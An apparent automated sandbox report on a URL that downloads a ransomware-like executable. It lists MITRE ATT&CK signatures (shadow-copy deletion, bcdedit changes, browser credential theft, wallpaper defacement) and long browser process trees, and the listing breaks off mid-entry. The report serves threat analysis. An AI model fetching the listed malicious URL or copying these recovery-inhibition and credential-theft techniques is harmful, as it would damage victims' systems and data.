hxxp://dro[.]pm/ba

Analysis

max time kernel
550s
max time network
551s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
25/08/2024, 13:01

Sharing

Copy URL Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

http://dro.pm/ba

Score

10^/10

defense_evasion discovery evasion execution ransomware spyware stealer

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
3760	chickencraftcopyfree.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2268	takeown.exe
844	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Modifies boot configuration data using bcdedit 1 IoCs

pid	Process
2080	bcdedit.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Mozilla\\Firefox\\Desktop Background.bmp"	firefox.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3976	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\chickencraftcopyfree.exe:Zone.Identifier	firefox.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chickencraftcopyfree.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2132	vssadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4020	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000_Classes\Local Settings	firefox.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\chickencraftcopyfree.exe:Zone.Identifier	firefox.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1504	chrome.exe
1504	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1976	firefox.exe
Token: SeDebugPrivilege	1976	firefox.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe

Suspicious use of FindShellTrayWindow 47 IoCs

pid	Process
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
2036	notepad.exe

Suspicious use of SendNotifyMessage 41 IoCs

pid	Process
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe
816	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1644 wrote to memory of 1976	1644	firefox.exe	30
PID 1644 wrote to memory of 1976	1644	firefox.exe	30
PID 1644 wrote to memory of 1976	1644	firefox.exe	30
PID 1644 wrote to memory of 1976	1644	firefox.exe	30
PID 1644 wrote to memory of 1976	1644	firefox.exe	30
PID 1644 wrote to memory of 1976	1644	firefox.exe	30
PID 1644 wrote to memory of 1976	1644	firefox.exe	30
PID 1644 wrote to memory of 1976	1644	firefox.exe	30
PID 1644 wrote to memory of 1976	1644	firefox.exe	30
PID 1644 wrote to memory of 1976	1644	firefox.exe	30
PID 1644 wrote to memory of 1976	1644	firefox.exe	30
PID 1644 wrote to memory of 1976	1644	firefox.exe	30
PID 1976 wrote to memory of 2968	1976	firefox.exe	31
PID 1976 wrote to memory of 2968	1976	firefox.exe	31
PID 1976 wrote to memory of 2968	1976	firefox.exe	31
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 2516	1976	firefox.exe	32
PID 1976 wrote to memory of 1504	1976	firefox.exe	33
PID 1976 wrote to memory of 1504	1976	firefox.exe	33
PID 1976 wrote to memory of 1504	1976	firefox.exe	33
PID 1976 wrote to memory of 1504	1976	firefox.exe	33
PID 1976 wrote to memory of 1504	1976	firefox.exe	33

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://dro.pm/ba"
1⤵
- Suspicious use of WriteProcessMemory
PID:1644
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://dro.pm/ba
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.0.1980419518\2017813953" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1216 -prefsLen 20808 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2706a38e-fe9d-4cc2-bbef-e7f1ccf86ba1} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 1288 fedab58 gpu
    3⤵
    PID:2968
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.1.1309306370\1576228135" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21669 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b1c1e1a-4b61-48e4-9568-ee281b1f474e} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 1500 e6fe58 socket
    3⤵
    - Checks processor information in registry
    PID:2516
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.2.1317524723\1549140185" -childID 1 -isForBrowser -prefsHandle 2092 -prefMapHandle 2088 -prefsLen 21707 -prefMapSize 233444 -jsInitHandle 700 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {70b1bad1-b3e5-4907-b7a8-569345094e03} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 2104 1a2b1358 tab
    3⤵
    PID:1504
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.3.464634077\619233913" -childID 2 -isForBrowser -prefsHandle 2908 -prefMapHandle 2904 -prefsLen 26177 -prefMapSize 233444 -jsInitHandle 700 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b65bbbdd-6eeb-4265-bc73-cf21c363013f} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 2920 e61358 tab
    3⤵
    PID:2780
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.4.305383245\642922290" -childID 3 -isForBrowser -prefsHandle 3648 -prefMapHandle 3652 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 700 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3e4f9de-e931-4f61-a511-426193869818} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 3668 1b0eb458 tab
    3⤵
    PID:2524
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.5.1191915756\550476244" -childID 4 -isForBrowser -prefsHandle 3800 -prefMapHandle 3752 -prefsLen 26450 -prefMapSize 233444 -jsInitHandle 700 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {09b94b2e-7f3c-4954-82d2-5fee6feb6fd2} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 3804 20783158 tab
    3⤵
    PID:1768
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.6.901926680\2065742362" -childID 5 -isForBrowser -prefsHandle 3932 -prefMapHandle 3940 -prefsLen 26450 -prefMapSize 233444 -jsInitHandle 700 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce5b221f-2cb3-4ad6-9ef0-66d863b8760f} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 3684 20cc1d58 tab
    3⤵
    PID:756
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.7.1842164132\1334066707" -childID 6 -isForBrowser -prefsHandle 4092 -prefMapHandle 4112 -prefsLen 26450 -prefMapSize 233444 -jsInitHandle 700 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec61e1a4-579d-499d-81ef-e96599f69928} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 4008 20cc0b58 tab
    3⤵
    PID:2488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef60e9758,0x7fef60e9768,0x7fef60e9778
  2⤵
  PID:3060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1204,i,14527063299680857089,17970785836201083537,131072 /prefetch:2
  2⤵
  PID:1996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1204,i,14527063299680857089,17970785836201083537,131072 /prefetch:8
  2⤵
  PID:1744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 --field-trial-handle=1204,i,14527063299680857089,17970785836201083537,131072 /prefetch:8
  2⤵
  PID:1880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2296 --field-trial-handle=1204,i,14527063299680857089,17970785836201083537,131072 /prefetch:1
  2⤵
  PID:1908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1204,i,14527063299680857089,17970785836201083537,131072 /prefetch:1
  2⤵
  PID:572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3220 --field-trial-handle=1204,i,14527063299680857089,17970785836201083537,131072 /prefetch:2
  2⤵
  PID:896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1468 --field-trial-handle=1204,i,14527063299680857089,17970785836201083537,131072 /prefetch:1
  2⤵
  PID:1640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3644 --field-trial-handle=1204,i,14527063299680857089,17970785836201083537,131072 /prefetch:8
  2⤵
  PID:2184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3656 --field-trial-handle=1204,i,14527063299680857089,17970785836201083537,131072 /prefetch:1
  2⤵
  PID:1900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=1204,i,14527063299680857089,17970785836201083537,131072 /prefetch:8
  2⤵
  PID:2176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 --field-trial-handle=1204,i,14527063299680857089,17970785836201083537,131072 /prefetch:8
  2⤵
  PID:2416

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1608

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:1096
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Sets desktop wallpaper using registry
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:816
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.0.1529688810\1945532068" -parentBuildID 20221007134813 -prefsHandle 1104 -prefMapHandle 1096 -prefsLen 23765 -prefMapSize 233932 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8efd3341-4e05-4782-899f-12f81e7121c5} 816 "\\.\pipe\gecko-crash-server-pipe.816" 1188 f9ea258 gpu
    3⤵
    PID:2536
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.1.2013025445\1947426862" -parentBuildID 20221007134813 -prefsHandle 1332 -prefMapHandle 1328 -prefsLen 23810 -prefMapSize 233932 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ee9a572-1c7f-4426-98fc-c6b5ab8a3c22} 816 "\\.\pipe\gecko-crash-server-pipe.816" 1356 ee6f58 socket
    3⤵
    - Checks processor information in registry
    PID:1928
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.2.1508692809\617636355" -childID 1 -isForBrowser -prefsHandle 2000 -prefMapHandle 1996 -prefsLen 24271 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1ea15f3-463c-4c5f-810a-2f4a2b2eca60} 816 "\\.\pipe\gecko-crash-server-pipe.816" 2012 1235d458 tab
    3⤵
    PID:296
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.3.1189080633\1635673669" -childID 2 -isForBrowser -prefsHandle 2568 -prefMapHandle 2564 -prefsLen 29456 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e42d8702-4c04-418b-84a5-aa3c5b0430b5} 816 "\\.\pipe\gecko-crash-server-pipe.816" 2580 1c7b6358 tab
    3⤵
    PID:2800
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="816.4.1292261192\1222151351" -childID 3 -isForBrowser -prefsHandle 2716 -prefMapHandle 2712 -prefsLen 29456 -prefMapSize 233932 -jsInitHandle 896 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b79160a7-bd90-4ab5-9c1d-2db5dd685c27} 816 "\\.\pipe\gecko-crash-server-pipe.816" 2728 1d7c9e58 tab
    3⤵
    PID:2036
- - C:\Program Files\Mozilla Firefox\firefox.exe
